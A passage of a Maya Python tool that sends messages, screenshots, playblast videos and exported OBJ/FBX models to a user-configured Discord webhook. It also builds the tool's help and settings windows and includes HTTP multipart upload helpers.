current_scene_name = cmds.file(q=True, sn=True).split('/')[-1]
if current_scene_name == '': # If not saved
current_scene_name ='never_saved_untitled_scene'
else:
if current_scene_name.endswith('.ma') or current_scene_name.endswith('.mb'):
current_scene_name=current_scene_name[:-3]
temp_path = generate_temp_file( gt_mtod_settings_submit_ss.get('video_format'), file_name=current_scene_name)
disable_buttons() # This needs to happen before creating the playblast to avoid multiple clicks
temp_playblast_file = capture_playblast_animation(temp_path, gt_mtod_settings_submit_ss.get('video_scale_pct'), gt_mtod_settings_submit_ss.get('video_compression'), gt_mtod_settings_submit_ss.get('video_output_type') )
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_playblast_file, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'playblast', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning(webhook_error_message)
def send_message_only():
''' Attempts to send the message only (no images/videos) using current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
try:
upload_message = cmds.textField(attached_message_txtfield, q=True, text=True)
if upload_message.strip() != '':
update_text_status()
def threaded_upload():
try:
utils.executeDeferred(disable_buttons)
response = discord_post_message(get_username(), upload_message, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(response_inview_feedback, 'message', response, display_inview=gt_mtod_settings_submit_ss.get('feedback_visibility'))
utils.executeDeferred(clear_attached_message, response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
else:
cmds.warning('Your message is empty, please type something in case you want to send only a message.')
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
else:
cmds.warning(webhook_error_message)
def send_model_obj():
''' Attempts to export selected model as an OBJ file and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
selection = cmds.ls(selection=True)
if len(selection) > 0:
try:
update_text_status()
# Determine naming
if len(selection) == 1:
export_name = selection[-1]
else:
export_name = str(len(selection)).zfill(2) + '_selected_objects'
temp_path = generate_temp_file( 'obj', file_name=export_name)
disable_buttons()
temp_exported_obj = cmds.file(temp_path, pr=1, typ="OBJexport",es=1, f=True, op="groups=0; ptgroups=0; materials=0; smoothing=0; normals=0")
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_exported_obj, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'OBJ file', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning('Nothing selected. Please, select what you want to send.')
else:
cmds.warning(webhook_error_message)
def send_model_fbx():
''' Attempts to export selected model as an FBX file and upload it using the current settings '''
if gt_mtod_settings_submit_ss.get('is_new_instance'):
update_discord_webhook_validity(gt_mtod_settings_submit_ss.get('discord_webhook'))
if gt_mtod_settings_submit_ss.get('is_webhook_valid'):
selection = cmds.ls(selection=True)
if len(selection) > 0:
try:
update_text_status()
# Determine naming
if len(selection) == 1:
export_name = selection[-1]
else:
export_name = str(len(selection)).zfill(2) + '_selected_objects'
temp_path = generate_temp_file( 'fbx', file_name=export_name)
disable_buttons()
cmds.FBXExport('-file', temp_path, '-s')
print(temp_path)
if gt_mtod_settings_submit_ss.get('timestamp_visibility'):
upload_message = get_date_time_message()
else:
upload_message = ''
def threaded_upload():
try:
response = discord_post_attachment(get_username(), upload_message, temp_path, gt_mtod_settings_submit_ss.get('discord_webhook'))
utils.executeDeferred(enable_buttons)
utils.executeDeferred(parse_sending_response, response)
utils.executeDeferred(attached_text_message, 'FBX file', response)
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
utils.executeDeferred(enable_buttons)
finally:
utils.executeDeferred(enable_buttons)
thread = threading.Thread(None, target = threaded_upload)
thread.start()
except:
update_text_status(error=True)
cmds.warning(webhook_error_message)
enable_buttons()
else:
cmds.warning('Nothing selected. Please, select what you want to send.')
else:
cmds.warning(webhook_error_message)
# Show and Lock Window
cmds.showWindow(build_gui_submit_screenshot)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(icon_image)
widget.setWindowIcon(icon)
# Main GUI Ends Here =================================================================================
# Creates Help GUI
def build_gui_help_maya_to_discord():
''' Builds the Help UI for GT Maya to Discord '''
window_name = "build_gui_help_maya_to_discord"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Help", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
main_column = cmds.columnLayout(p= window_name)
# Title Text
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
cmds.text(script_name + " Help", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p=main_column) # Empty Space
# Body ====================
help_font = 'smallPlainLabelFont'
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.text(l=script_name + ' allows you to quickly send', align="center")
cmds.text(l='images and videos (playblasts) from Maya to Discord', align="center")
cmds.text(l='using a Discord Webhook to bridge the two programs.', align="center")
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Webhooks:', align="center", fn="boldLabelFont")
cmds.text(l='A webhook (a.k.a. web callback or HTTP push API) is a way for', align="center", font=help_font)
cmds.text(l='an app to provide other applications with real-time information.', align="center", font=help_font)
cmds.text(l='You can use it to send messages to text channels without', align="center", font=help_font)
cmds.text(l='needing the discord application.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='How to get a Webhook URL:', align="center", fn="boldLabelFont")
cmds.text(l='If you own a Discord server or you have the correct privileges, ', align="center", font=help_font)
cmds.text(l='you can go to the settings to create a Webhook URL.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='To create one go to:', align="center", font=help_font)
cmds.text(l='Discord > Server > Server Settings > Webhooks > Create Webhook', align="center", font=help_font)
cmds.text(l='Give your webhook a name and select what channel it will operate.', align="center", font=help_font)
cmds.text(l='Copy the "Webhook URL" and load it in the setttings for this script.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='If you\'re just an user in the server, you\'ll have to ask the', align="center", font=help_font)
cmds.text(l='administrator of the server to provide you with a Webhook URL.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Send Buttons:', align="center", fn="boldLabelFont")
cmds.text(l='Send Message Only: Sends only the attached message', align="center", font=help_font)
cmds.text(l='(Use the textfield above the buttons to type your message)', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Send Desktop Screenshot: Sends a screenshot of your desktop.', align="center", font=help_font)
cmds.text(l='(This includes other programs and windows that are open)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Maya Window: Sends only the main Maya window.', align="center", font=help_font)
cmds.text(l='(This ignores other windows, even within Maya)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Viewport: Sends an image of the active viewport', align="center", font=help_font)
cmds.text(l='(Includes Heads Up Display text, but no UI elements)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send Playblast: Sends a playblast video', align="center", font=help_font)
cmds.text(l='(Use the script settings to determine details about the video)', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Send OBJ/FBX: Sends a model using the chosen format', align="center", font=help_font)
cmds.text(l='For settings, go to "File > Export Selection... > Options"', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Settings:', align="center", fn="boldLabelFont")
cmds.text(l='The settings are persistent, which means they will stay the same', align="center", font=help_font)
cmds.text(l='between Maya sessions.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Custom Username:', align="center", font=help_font)
cmds.text(l='Nickname used when posting content through the webhook.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Image & Video Format', align="center", font=help_font)
cmds.text(l='Extension used for the image and video files.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Video Options:', align="center", font=help_font)
cmds.text(l='Determines the settings used when recording a playblast.', align="center", font=help_font)
cmds.separator(h=7, style='none') # Empty Space
cmds.text(l='Feedback and Timestamp Options:', align="center", font=help_font)
cmds.text(l='Determines feedback visibility and timestamp use.', align="center", font=help_font)
cmds.separator(h=10, style='none') # Empty Space
cmds.text(l='Limitations:', align="center", fn="boldLabelFont")
cmds.text(l='Discord has a limit of 8MB for free users and 50MB for paid users', align="center", font=help_font)
cmds.text(l='for when uploading a file. If you get the error "Payload Too Large"', align="center", font=help_font)
cmds.text(l='it means your file exceeds the limits. Try changing the settings.', align="center", font=help_font)
cmds.separator(h=15, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.text('Guilherme Trevisan ')
cmds.text(l='<a href="mailto:trevisangmw@gmail.com">TrevisanGMW@gmail.com</a>', hl=True, highlightColor=[1,1,1])
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.separator(h=15, style='none') # Empty Space
cmds.text(l='<a href="https://github.com/TrevisanGMW">Github</a>', hl=True, highlightColor=[1,1,1])
cmds.separator(h=7, style='none') # Empty Space
# Close Button
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.separator(h=10, style='none')
cmds.button(l='Reset Persistent Settings', h=30, c=lambda args: reset_persistent_settings_maya_to_discord())
cmds.separator(h=5, style='none')
cmds.button(l='OK', h=30, c=lambda args: close_help_gui())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/question.png')
widget.setWindowIcon(icon)
def close_help_gui():
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
def build_gui_settings_maya_to_discord():
''' Builds the Settings UI for GT Maya to Discord '''
window_name = "build_gui_settings_maya_to_discord"
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
cmds.window(window_name, title= script_name + " Settings", mnb=False, mxb=False, s=True)
cmds.window(window_name, e=True, s=True, wh=[1,1])
main_column = cmds.columnLayout(p= window_name)
# Title Text
cmds.separator(h=12, style='none') # Empty Space
cmds.rowColumnLayout(nc=1, cw=[(1, 310)], cs=[(1, 10)], p=main_column) # Window Size Adjustment
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1, 10)], p=main_column) # Title Column
cmds.text(script_name + " Settings", bgc=[.4,.4,.4], fn="boldLabelFont", align="center")
cmds.separator(h=10, style='none', p=main_column) # Empty Space
# Current Settings =================
current_image_format = gt_mtod_settings_submit_ss.get('image_format')
current_video_format = gt_mtod_settings_submit_ss.get('video_format')
current_webhook = ''
current_custom_username = ''
if not gt_mtod_settings_submit_ss.get('is_first_time_running'):
if gt_mtod_settings_submit_ss.get('discord_webhook') != '':
current_webhook = gt_mtod_settings_submit_ss.get('discord_webhook')
if gt_mtod_settings_submit_ss.get('custom_username') != '':
current_custom_username = gt_mtod_settings_submit_ss.get('custom_username')
current_video_scale = gt_mtod_settings_submit_ss.get('video_scale_pct')
current_compression = gt_mtod_settings_submit_ss.get('video_compression')
current_output_type = gt_mtod_settings_submit_ss.get('video_output_type')
# Body ====================
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.text(l='Discord Webhook Url', align="center")
cmds.separator(h=5, style='none') # Empty Space
new_webhook_input = cmds.textField(pht='https://discordapp.com/api/webhooks/...', text=current_webhook, font= 'smallPlainLabelFont', enable=False) # MODIFIED
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 120),(2, 85),(3, 85)], cs=[(1,10),(2,5),(3,5)], p=main_column)
cmds.text(l='Custom Username ', align="center")
cmds.text(l='Image Format ', align="center")
cmds.text(l='Video Format ', align="center")
new_username_input = cmds.textField(pht='username (not required)', text=current_custom_username, font= 'smallPlainLabelFont')
new_image_format_input = cmds.textField(pht='jpg', text=current_image_format, font= 'smallPlainLabelFont')
new_video_format_input = cmds.textField(pht='mov', text=current_video_format, font= 'smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=3, cw=[(1, 90),(2, 95),(3, 105)], cs=[(1,10),(2,5),(3,5)], p=main_column)
cmds.text(l='Video Scale % ', align="center", font= 'smallPlainLabelFont')
cmds.text(l='Video Compression ', align="center", font= 'smallPlainLabelFont')
cmds.text(l='Video Output Type ', align="center", font= 'smallPlainLabelFont')
video_scale_input = cmds.intSliderGrp( field=True, minValue=1, maxValue=100, fieldMinValue=1, fieldMaxValue=100, value=current_video_scale, cw=([1,35],[2,65]))
compression_input = cmds.optionMenu()
try:
for name in get_available_playblast_compressions(current_output_type):
cmds.menuItem( label=name )
# Find stored menuItem and select it
for idx,obj in enumerate(cmds.optionMenu(compression_input, q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == current_compression:
cmds.optionMenu(compression_input, e=True, select=idx+1) # 1-based selection
except:
cmds.menuItem( label='none' )
output_type_input = cmds.optionMenu(cc=lambda args: update_available_compressions())
cmds.menuItem( label='qt' )
cmds.menuItem( label='avi' )
cmds.menuItem( label='movie' )
# Find stored menuItem and select it
for idx,obj in enumerate(cmds.optionMenu(output_type_input,q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == current_output_type:
cmds.optionMenu(output_type_input, e=True, select=idx+1)
cmds.separator(h=10, style='none') # Empty Space
cmds.rowColumnLayout(nc=2, cw=[(1, 140),(2, 140)], cs=[(1,10),(2, 0)], p=main_column)
cmds.rowColumnLayout(nc=4, cw=[(1, 15),(2, 140),(3, 15),(4, 100)], cs=[(1,20),(2,5),(3,5)], p=main_column)
feedback_visibility_chk = cmds.checkBox(label='', value=gt_mtod_settings_submit_ss.get('feedback_visibility'), cc=lambda args: update_checkbox_settings_data())
cmds.text(l='Display Viewport Feedback', align="left", font= 'smallPlainLabelFont')
timestamp_visibility_chk = cmds.checkBox(label='', value=gt_mtod_settings_submit_ss.get('timestamp_visibility'), cc=lambda args: update_checkbox_settings_data())
cmds.text(l='Include Timestamp', align="center", font= 'smallPlainLabelFont')
cmds.separator(h=10, style='none') # Empty Space
# Bottom Buttons
cmds.rowColumnLayout(nc=2, cw=[(1, 145),(2, 145)], cs=[(1,10),(2,10)], p=main_column)
cmds.button(l='Reset Settings', h=30, c=lambda args: reset_settings())
cmds.button(l='Reset Webhook', c=lambda args: cmds.textField(new_webhook_input, e=True, text=''))
cmds.separator(h=5, style='none')
cmds.rowColumnLayout(nc=1, cw=[(1, 300)], cs=[(1,10)], p=main_column)
cmds.button(l='Apply', h=30, bgc=(.6, .6, .6), c=lambda args: apply_settings())
cmds.separator(h=8, style='none')
# Show and Lock Window
cmds.showWindow(window_name)
cmds.window(window_name, e=True, s=False)
# Set Window Icon
qw = omui.MQtUtil.findWindow(window_name)
if python_version == 3:
widget = wrapInstance(int(qw), QWidget)
else:
widget = wrapInstance(long(qw), QWidget)
icon = QIcon(':/toolSettings.png')
widget.setWindowIcon(icon)
def update_available_compressions():
''' Updates items stored in the optionMenu to contain only compatible compressions '''
try:
cmds.optionMenu(compression_input, e=True, dai=True)
for name in get_available_playblast_compressions(cmds.optionMenu(output_type_input, q=True, value=True)):
cmds.menuItem( label=name, p=compression_input)
except:
cmds.menuItem( label='none', p=compression_input )
def reset_settings():
'''
Resets fields in the settings (do not affect stored variables or persistent setttings)
It uses a deep copy of the settings dictionary to reset it.
'''
cmds.textField(new_username_input, e=True, text=gt_mtod_settings_submit_ss_default.get('custom_username'))
cmds.textField(new_image_format_input, e=True, text=gt_mtod_settings_submit_ss_default.get('image_format'))
cmds.textField(new_video_format_input, e=True, text=gt_mtod_settings_submit_ss_default.get('video_format') )
for idx,obj in enumerate(cmds.optionMenu(output_type_input,q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == gt_mtod_settings_submit_ss_default.get('video_output_type'):
cmds.optionMenu(output_type_input, e=True, select=idx+1)
update_available_compressions()
found_default = False
for idx,obj in enumerate(cmds.optionMenu(compression_input, q=True, itemListLong=True)):
if cmds.menuItem( obj , q=True, label=True ) == gt_mtod_settings_submit_ss_default.get('video_compression'):
cmds.optionMenu(compression_input, e=True, select=idx+1)
found_default = True
if not found_default:
cmds.menuItem( label='none', p=compression_input )
cmds.intSliderGrp(video_scale_input, e=True, value=gt_mtod_settings_submit_ss_default.get('video_scale_pct'))
# Check box Management
cmds.checkBox(feedback_visibility_chk, e=True, value=gt_mtod_settings_submit_ss_default.get('feedback_visibility'))
cmds.checkBox(timestamp_visibility_chk, e=True, value=gt_mtod_settings_submit_ss_default.get('timestamp_visibility'))
update_checkbox_settings_data()
def apply_settings():
''' Transfer new settings to variables and store them as persistent settings '''
set_persistent_settings_maya_to_discord(cmds.textField(new_username_input, q=True, text=True), cmds.textField(new_webhook_input, q=True, text=True),\
cmds.textField(new_image_format_input, q=True, text=True), cmds.textField(new_video_format_input, q=True, text=True),\
cmds.intSliderGrp(video_scale_input, q=True, value=True), cmds.optionMenu(compression_input, q=True, value=True),\
cmds.optionMenu(output_type_input, q=True, value=True))
gt_mtod_settings_submit_ss['is_first_time_running'] = False
gt_mtod_settings_submit_ss['is_new_instance'] = True
build_gui_submit_screenshot()
if cmds.window(window_name, exists=True):
cmds.deleteUI(window_name, window=True)
def update_checkbox_settings_data():
feedback_visibility = cmds.checkBox(feedback_visibility_chk, q=True, value=True)
timestamp_visibility = cmds.checkBox(timestamp_visibility_chk, q=True, value=True)
cmds.optionVar( iv=('gt_maya_to_discord_feedback_visibility', int(feedback_visibility)) )
gt_mtod_settings_submit_ss['feedback_visibility'] = bool(cmds.optionVar(q=("gt_maya_to_discord_feedback_visibility")))
cmds.optionVar( iv=('gt_maya_to_discord_timestamp_visibility', int(timestamp_visibility)) )
gt_mtod_settings_submit_ss['timestamp_visibility'] = bool(cmds.optionVar(q=("gt_maya_to_discord_timestamp_visibility")))
def parse_discord_api(discord_webhook_full_path):
''' Parses and returns two strings to be used with HTTPSConnection instead of Http()
Parameters:
discord_webhook_full_path (str): Discord Webhook (Full Path)
Returns:
discord_api_host (str): Only the host used for discord's api
discord_api_repo (str): The rest of the path used to describe the webhook
'''
path_elements = discord_webhook_full_path.replace('https://','').replace('http://','').split('/')
host = ''
repo = ''
if len(path_elements) == 1:
raise Exception('Failed to parse Discord Webhook path.')
else:
host = path_elements[0]
for path_part in path_elements:
if path_part != host:
repo += '/' + path_part
return host, repo
def generate_temp_file(file_format, file_name='tmp'):
'''
Generates a temporary file in the temp folder (Usually "C:/Users/USERNAME/AppData/Local/Temp/tmp.ext")
Parameters:
file_format (str) : Extension of the temp file
file_name (str): File name (Optional)
Returns:
file ('unicode'): Path to generated file
'''
temp_dir = cmds.internalVar(userTmpDir=True)
tmp_file = temp_dir + file_name + '.' + file_format
return tmp_file
def capture_desktop_screenshot(image_file):
'''
Takes a snapshot of the entire Desktop and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
app = QtWidgets.QApplication.instance()
win = omui.MQtUtil_mainWindow()
if python_version == 3:
ptr = wrapInstance(int(win), QtWidgets.QMainWindow)
else:
ptr = wrapInstance(long(win), QtWidgets.QMainWindow)
screen_number = app.desktop().screenNumber(ptr)
screen_geometry = app.desktop().screenGeometry(screen_number)
frame = app.primaryScreen().grabWindow(0, screen_geometry.x(), screen_geometry.y(), screen_geometry.width(), screen_geometry.height())
frame.save(image_file)
return image_file
def capture_app_window(image_file):
'''
Takes a snapshot of the entire Qt App (Maya) and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
win = omui.MQtUtil_mainWindow()
if python_version == 3:
ptr = wrapInstance(int(win), QtWidgets.QMainWindow)
main_window_id = ptr.winId()
long_win_id = int(main_window_id)
else:
ptr = wrapInstance(long(win), QtWidgets.QMainWindow)
main_window_id = ptr.winId()
long_win_id = long(main_window_id)
frame = QtGui.QPixmap.grabWindow(long_win_id)
frame.save(image_file)
return image_file
def capture_viewport(image_file):
'''
Takes a snapshot of the active viewport and writes it to an image
Parameters:
image_file (str): File path for where to store generated image
Returns:
image_file (str): Returns the same path after storing data in it
'''
view = omui.M3dView.active3dView()
image = om.MImage()
view.readColorBuffer(image, True)
image.writeToFile(image_file)
return image_file
def discord_post_message(username, message, webhook_url):
'''
Sends a string message to Discord using a webhook
Parameters:
username (str): A string to be used as the username (Replaces bot name)
message (str): A string to be used as a message
webhook_url (str): A Discord Webhook to make the request
Returns:
response (dict): Returns the response generated by the http object
'''
if python_version == 3:
bot_message = {
'username': username,
'content': message
}
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('POST', path, headers={'Content-Type': 'application/json; charset=UTF-8', 'User-Agent' : 'gt_maya_to_discord/' + str(script_version)} , body=dumps(bot_message))
response = connection.getresponse()
return tuple([response])
#response_headers = dict(response.getheaders())
#response_headers['status'] = response.status
#response_headers['reason'] = response.reason
#return tuple([response_headers])
else:
bot_message = {
'username': username,
'content': message
}
message_headers = {'Content-Type': 'application/json; charset=UTF-8'}
http_obj = Http()
response = http_obj.request(
uri=webhook_url,
method='POST',
headers=message_headers,
body=dumps(bot_message),
)
return response
def encode_multipart(fields, files, boundary=None):
'''
Encode dict of form fields and dict of files as multipart/form-data.
Return tuple of (body_string, headers_dict). Each value in files is a dict
with required keys 'filename' and 'content', and optional 'mimetype' (if
not specified, tries to guess mime type or uses 'application/octet-stream').
>>> body, headers = encode_multipart({'FIELD': 'VALUE'},
... {'FILE': {'filename': 'F.TXT', 'content': 'CONTENT'}},
... boundary='BOUNDARY')
>>> print('\n'.join(repr(l) for l in body.split('\r\n')))
'--BOUNDARY'
'Content-Disposition: form-data; name="FIELD"'
''
'VALUE'
'--BOUNDARY'
'Content-Disposition: form-data; name="FILE"; filename="F.TXT"'
'Content-Type: text/plain'
''
'CONTENT'
'--BOUNDARY--'
''
'''
def escape_quote(s):
return s.replace('"', '\\"')
if boundary is None:
boundary = ''.join(random.choice(_BOUNDARY_CHARS) for i in range(30))
lines = []
for name, value in fields.items():
lines.extend((
'--{0}'.format(boundary),
'Content-Disposition: form-data; name="{0}"'.format(escape_quote(name)),
'',
str(value),
))
for name, value in files.items():
filename = value['filename']
if 'mimetype' in value:
mimetype = value['mimetype']
else:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
lines.extend((
'--{0}'.format(boundary),
'Content-Disposition: form-data; name="{0}"; filename="{1}"'.format(
escape_quote(name), escape_quote(filename)),
'Content-Type: {0}'.format(mimetype),
'',
value['content'],
))
lines.extend((
'--{0}--'.format(boundary),
'',
))
clean_lines = [] # Only Bytes
for line in lines:
if type(line) == bytes:
clean_lines.append(line)
else:
clean_lines.append(bytes(line, 'utf-8'))
body = b'\r\n'.join(clean_lines)
headers = {
'Content-Type': 'multipart/form-data; boundary={0}'.format(boundary),
'Content-Length': str(len(body)),
}
print((body, headers))
return (body, headers)
def discord_post_attachment(username, message, file_path, webhook_url):
'''
Sends a message and an attachment to Discord using a webhook
Parameters:
username (str): A string to be used as the username (replaces bot name)
message (str): A string to be used as a message
file_path (str): A path for a file that will be uploaded
webhook_url (str): A Discord Webhook to make the request
Returns:
response (dict): Returns the response generated by the http object
'''
if python_version == 3:
fields = { 'content' : message, 'username' : username}
file_name = file_path.split('/')[-1]
files = {'file1': {'filename': file_name, 'content': open(file_path, "rb").read()}}
data, headers = encode_multipart(fields, files)
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('POST', path, headers=headers , body=data)
response = connection.getresponse()
return tuple([response])
else:
fields = { 'content' : message, 'username' : username}
file_name = file_path.split('/')[-1]
files = {'file1': {'filename': file_name, 'content': open(file_path, "rb").read()}}
data, headers = encode_multipart(fields, files)
http_obj = Http()
response = http_obj.request(
uri=webhook_url,
method='POST',
headers=headers,
body=data
)
return response
def get_available_playblast_compressions(format):
return mel.eval('playblast -format "{0}" -q -compression;'.format(format))
def update_discord_webhook_validity(webhook_url):
'''
Updates Validity of a webhook for when running the script again a second time.
This function updates the "settings" dictionary directly.
Parameters:
webhook_url (str): Discord Webhook URL
'''
success_codes = [200, 201, 202, 203, 204, 205, 206]
if python_version == 3:
try:
host, path = parse_discord_api(webhook_url)
connection = http.client.HTTPSConnection(host)
connection.request('GET', path, headers={'Content-Type': 'application/json; charset=UTF-8', 'User-Agent' : 'gt_maya_to_discord/' + str(script_version)})
response = connection.getresponse()
response_content_dict = loads(response.read())
if response.status in success_codes:
response_content_dict.get('name')
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = True
else:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
except:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
else:
try:
http_obj = Http()
response, content = http_obj.request(webhook_url)
if response.status in success_codes:
response_content_dict = loads(content)
response_content_dict.get('name')
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = True
else:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
except:
gt_mtod_settings_submit_ss['is_new_instance'] = False
gt_mtod_settings_submit_ss['is_webhook_valid'] = False
def discord_get_webhook_name(webhook_url):
'''
Requests the name of the webhook and returns a string representing it
Parameters:
webhook_url (str): Discord Webhook URL
Returns:
name (str): The name of the webhook (or error string, if operation failed)
'''
try:
http_obj = Http()
response, content = http_obj.request(webhook_url)
success_codes = [200, 201, 202, 203, 204, 205, 206]
if response.status in success_codes:
response_content_dict = loads(content)
return response_content_dict.get('name')
else:
return 'Error reading webhook response'
except:
cmds.warning('Error connecting to provided webhook. Make sure you\'re pasting the correct URL')
return 'Error connecting to webhook'
def get_readable_size(size, precision=2):
'''
Returns a human redable version of the size of a file
Parameters:
size (float or int) : size of the file in bytes
precision (int) : precision of the returned result
Returns:
formated_string (string) : Size + Suffix
'''
suffixes=['B','KB','MB','GB','TB']
suffix_index = 0
while size > 1024 and suffix_index < 4:
suffix_index += 1
size = size/1024.0
return "%.*f%s"%(precision, size, suffixes[suffix_index])
def response_inview_feedback(operation_name, response, write_output=True, display_inview=True):
'''
Prints an inViewMessage to give feedback to the user about what is being executed.
Uses the module "random" to force identical messages to appear at the same time.
Parameters:
operation_name (string): name of the operation being display (e.g. playblast)
response (dict): A dictionary response received from a HTTP object after post/get operation.
write_output (bool): Determines if the functions will write an extra output text (Like a "Result: pCube1" text output)
display_inview (bool): Determines if generated message will be displayed as an inView message or not (visibility)
'''
message = '<' + str(random.random()) + '>'
if len(response) >= 1:
status_value = response[0].status
reason_value = response[0].reason
success_codes = [200, 201, 202, 203, 204, 205, 206]
if status_value in success_codes:
message += 'The ' + str(operation_name) + ' was <span style=\"color:#00FF00;text-decoration:underline;\">sent successfully</span>.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was sent successfully. Web response: ' + str(reason_value) + ' (' + str(status_value) + ')')
else: # Error
message += 'The ' + str(operation_name) + ' was <span style=\"color:#FF0000;text-decoration:underline;\">not sent.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was sent. Web response: ' + str(reason_value) + ' (' + str(status_value) + ')')
else :
message += 'The ' + str(operation_name) + ' was <span style=\"color:#FF0000;text-decoration:underline;\">not sent.'
if write_output:
sys.stdout.write('The ' + str(operation_name) + ' was not sent. Error: Web responsed can\'t be read.')
if display_inview:
cmds.inViewMessage(amg=message, pos='botLeft', fade=True, alpha=.9)
if __name__ == '__main__':
#build_gui_submit_screenshot()
